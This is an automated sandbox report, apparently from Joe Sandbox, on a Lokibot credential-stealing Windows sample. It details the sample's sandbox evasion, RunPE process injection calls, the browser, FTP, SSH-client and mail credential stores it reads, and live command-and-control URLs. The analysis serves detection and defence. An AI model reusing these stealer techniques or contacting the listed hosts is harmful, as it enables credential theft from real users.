Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Mcx2Xk0fqn.exe, 00000000.00000002.1654628444.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Memory allocated: AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Memory allocated: 2AB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Memory allocated: 4AB0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Memory allocated: 4D80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Memory allocated: 5D80000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Memory allocated: 4D80000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe TID: 7292	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe TID: 7308	Thread sleep time: -60000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe

Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

1_2_00403D74

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Thread delayed: delay time: 60000			Jump to behavior

Source: Mcx2Xk0fqn.exe, 00000001.00000002.1683818444.0000000001248000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe

Code function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]

1_2_0040317B

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe

Code function: 1_2_00402B7C GetProcessHeap,RtlAllocateHeap,

1_2_00402B7C

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.Mcx2Xk0fqn.exe.eb0000.0.raw.unpack, RunPE.cs	Reference to suspicious API methods: GetProcAddress(intPtr, procname)
Source: 0.2.Mcx2Xk0fqn.exe.eb0000.0.raw.unpack, RunPE.cs	Reference to suspicious API methods: ReadProcessMemory(lpProcessInformation.hProcess, lpContext.Ebx + 8, array, 4u, out var lpNumberOfBytesWritten)
Source: 0.2.Mcx2Xk0fqn.exe.eb0000.0.raw.unpack, RunPE.cs	Reference to suspicious API methods: VirtualAllocEx(lpProcessInformation.hProcess, new IntPtr(iMAGE_NT_HEADERS.OptionalHeader.ImageBase), iMAGE_NT_HEADERS.OptionalHeader.SizeOfImage, 12288u, 64u)
Source: 0.2.Mcx2Xk0fqn.exe.eb0000.0.raw.unpack, RunPE.cs	Reference to suspicious API methods: WriteProcessMemory(lpProcessInformation.hProcess, zero, file, iMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders, out lpNumberOfBytesWritten)
Source: 0.2.Mcx2Xk0fqn.exe.eb0000.0.raw.unpack, RunPE.cs	Reference to suspicious API methods: VirtualProtectEx(lpProcessInformation.hProcess, new IntPtr(iMAGE_NT_HEADERS.OptionalHeader.ImageBase + iMAGE_SECTION_HEADER.VirtualAddress), iMAGE_SECTION_HEADER.VirtualSize, 64u, out var _)

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe

Memory written: C:\Users\user\Desktop\Mcx2Xk0fqn.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe

Process created: C:\Users\user\Desktop\Mcx2Xk0fqn.exe "C:\Users\user\Desktop\Mcx2Xk0fqn.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 0.2.Mcx2Xk0fqn.exe.3b81821.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Mcx2Xk0fqn.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Mcx2Xk0fqn.exe.3ab6de0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Mcx2Xk0fqn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Mcx2Xk0fqn.exe.3bba651.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1654908929.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1654908929.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1654908929.0000000003B2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1654628444.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Mcx2Xk0fqn.exe PID: 7272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Mcx2Xk0fqn.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000001.00000002.1683818444.0000000001248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: PopPassword		1_2_0040D069
Source: C:\Users\user\Desktop\Mcx2Xk0fqn.exe	Code function: SmtpPassword		1_2_0040D069

Source: Yara match	File source: 0.2.Mcx2Xk0fqn.exe.3b81821.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Mcx2Xk0fqn.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Mcx2Xk0fqn.exe.3ab6de0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Mcx2Xk0fqn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Mcx2Xk0fqn.exe.4d5c8c1.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Mcx2Xk0fqn.exe.3bba651.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Mcx2Xk0fqn.exe.3b9dd90.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Mcx2Xk0fqn.exe.3b64f60.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Mcx2Xk0fqn.exe.4d40000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1654908929.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1655167810.0000000004D40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1654908929.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1654908929.0000000003B2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1654628444.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	111 Process Injection	1 Disable or Modify Tools	2 Credentials in Registry	41 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	2 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	3 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	111 Process Injection	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Mcx2Xk0fqn.exe	77%	ReversingLabs	ByteCode-MSIL.Trojan.Skeeyah
Mcx2Xk0fqn.exe	63%	Virustotal		Browse
Mcx2Xk0fqn.exe	100%	Avira	HEUR/AGEN.1311864
Mcx2Xk0fqn.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://kbfvzoboss.bid/alien/fre.php	100%	URL Reputation	malware
http://kbfvzoboss.bid/alien/fre.php	100%	URL Reputation	malware
http://alphastand.win/alien/fre.php	100%	URL Reputation	malware
http://alphastand.trade/alien/fre.php	100%	URL Reputation	malware
http://alphastand.top/alien/fre.php	100%	URL Reputation	malware
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://89.34.237.212/annonymous/fre.phpzpf	0%	Avira URL Cloud	safe
http://89.34.237.212/annonymous/fre.php	0%	Avira URL Cloud	safe
http://89.34.237.212/annonymous/fre.php	14%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: malware URL Reputation: malware	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: malware	unknown
http://89.34.237.212/annonymous/fre.php	true	14%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://89.34.237.212/annonymous/fre.phpzpf	Mcx2Xk0fqn.exe, 00000001.00000002.1683818444.0000000001248000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ibsensoftware.com/	Mcx2Xk0fqn.exe, Mcx2Xk0fqn.exe, 00000001.00000002.1683652068.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
89.34.237.212	unknown	Romania		49367	ASSEFLOWAmsterdamInternetExchangeAMS-IXIT	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1501612
Start date and time:	2024-08-30 08:11:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Mcx2Xk0fqn.exe renamed because original name is a hash value
Original Sample Name:	c421a43f741ad586338b3739bd812b95.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/3@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 84 Number of non-executed functions: 23
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:11:57	API Interceptor	1x Sleep call for process: Mcx2Xk0fqn.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ASSEFLOWAmsterdamInternetExchangeAMS-IXIT	td2RgV6HyP.exe	Get hash	malicious	SystemBC	Browse	89.34.236.191
	file.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	158.58.172.125
	BKGCONF-THD1914129-BKGCONF-THD1914129.vbs	Get hash	malicious	Remcos, GuLoader	Browse	89.40.227.248
	5f1uj5aMdD.elf	Get hash	malicious	Unknown	Browse	95.141.43.103
	file.exe	Get hash	malicious	LummaC, Glupteba, SmokeLoader, Stealc, Xmrig	Browse	83.136.106.50
	yaALNupJCH.exe	Get hash	malicious	Amadey, Remcos, Vidar	Browse	95.141.41.12
	szsLEDKLDZ.elf	Get hash	malicious	Unknown	Browse	92.114.92.30
	9nSv9py6hs.exe	Get hash	malicious	DanaBot	Browse	95.141.32.211
	file.exe	Get hash	malicious	DanaBot	Browse	95.141.32.211
	upx9bnsbiZ.exe	Get hash	malicious	Raccoon Stealer v2	Browse	95.141.41.13

Process:	C:\Users\user\Desktop\Mcx2Xk0fqn.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	525
Entropy (8bit):	5.259753436570609
Encrypted:	false
SSDEEP:	12:Q3LaJU2C9XAn10U29xtUz1B0U2uk71K6xhk70Ug+9pfu9tv:MLF2CpI329Iz52VMzffuT
MD5:	BAF1CCDBBF490EC9AD4777DEA18A088E
SHA1:	182D70FB02C352E77B48E8659283D448143AE92B
SHA-256:	7712762A17AA3E6D3F233930BF94E91878F87A9C1C3010AC5346A4E615197E81
SHA-512:	53B86FAC03DD2FA75D140143C9B1D7F49FC1E9605DAE1B894910848864D153F239676B0AF37E5666EA9E606EED8F3BF180846ADC6DB82B7840F3C1AC2EFCDEA8
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Users\user\Desktop\Mcx2Xk0fqn.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\Mcx2Xk0fqn.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbq:4
MD5:	8CB7B7F28464C3FCBAE8A10C46204572
SHA1:	767FE80969EC2E67F54CC1B6D383C76E7859E2DE
SHA-256:	ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
SHA-512:	9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.516959989760247
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Mcx2Xk0fqn.exe
File size:	630'272 bytes
MD5:	c421a43f741ad586338b3739bd812b95
SHA1:	442a8888bfc86d52e838a739417f597df12a7845
SHA256:	faf6ebfff85ddb7f9f7477e5370e564b16febf619e1c865dda506e7649488815
SHA512:	bef0969463a3130f7d4bcbd9b09b0e85fab4cba74a27ac74cc45e8c43ac54c7833ab1d8fdb648e8d14bd274bebabdc5285fa30f03543e13b32caa41856092ad9
SSDEEP:	6144:AOeZw9zc/dDwPHgjrGEUgy2mAT2QxKZoKyqvVl:AOeWFc/dgq9UYgOKZC2V
TLSH:	61D4BEB04A87A047E99EFFF8C16220536A106C9D4DD747A5A1F93425E93AEA3CCD431F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P`.Z............................~.... ... ....@.. ....................................@................................

File Icon


Icon Hash:	1741485870652317

Static PE Info

General

Entrypoint:	0x440b7e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
